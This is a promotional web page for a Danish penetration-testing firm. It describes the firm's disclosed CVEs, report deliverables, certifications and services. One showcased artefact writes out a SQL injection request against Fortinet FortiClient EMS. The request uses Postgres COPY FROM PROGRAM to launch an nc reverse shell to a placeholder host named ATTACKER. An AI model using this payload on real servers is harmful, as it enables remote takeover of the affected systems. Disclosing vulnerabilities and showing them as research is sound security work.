Offensive security · Denmark

We find the vulnerabilities others miss.

Baldur Security is a Danish, research-driven offensive security consultancy. We have responsibly disclosed vulnerabilities leading to CVEs in software used by millions, including Chrome, Fortinet, Mitel, PRTG, Nagios and WithSecure. We test your applications the same way.

Proof, not adjectives

Public CVEs in software you probably run

This is the same work we do on your systems, not a scanner report with the logo changed. A selection from our research; the full list is on the research page.

ArtefactCVE-2025-59922 · Fortinet FortiClient EMS
# One <img> tag became a GET-based SQL injection which was then used for remote code execution
GET /api/v1/malware/threats?query=a');COPY pwn FROM PROGRAM
    'rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc ATTACKER 8959 >/tmp/a';--
Postgres FROM PROGRAM turned a stored avatar into a reverse shell. Full chain →
Deliverables

What you get

Every engagement ends with proof you can act on and documentation you can hand to auditors, customers and the board.

Report

  • A management summary for decision-makers
  • A technical section your team can act on line by line
  • Severity rated on real exploitability, not just a CVSS number
  • A retest after you remediate, in an updated report

Expert presentation

  • A walkthrough of every finding with a live Q&A
  • Ask us anything about the test, the method or the fix
  • Delivered to the board and the technical team alike

Letter of attestation

  • A signed, non-sensitive statement of the test you underwent
  • For regulators, customers and auditors
  • Enough to answer a vendor security questionnaire
Services

Eight ways in

One team. If what you need tested is not listed here, ask, the interesting targets rarely fit a category.

Certifications

The fundamentals under the track record

12+ years across sectors like banking, healthcare and the public sector, for organisations from 10 to 10,000 employees. We value real-world experience highest, and we have the certifications to back it up.

33CVEs published
100+penetration tests delivered
300+bug bounty reports
OSCE / OSCPOSCE / OSCP certified
Offensive Security
OSCE
Offensive Security Certified Expert. Exploit development and advanced web application attacks, the skills behind the memory-corruption and RCE findings in our disclosure list.
Penetration Testing
OSCP
Offensive Security Certified Professional. A hands-on exam in finding and exploiting vulnerabilities under time pressure, without automated tooling doing the work.

Tell us what you need tested

A 30-minute call is enough to scope most engagements. No account, no sales script, you talk to the people who do the testing.

Book a scoping call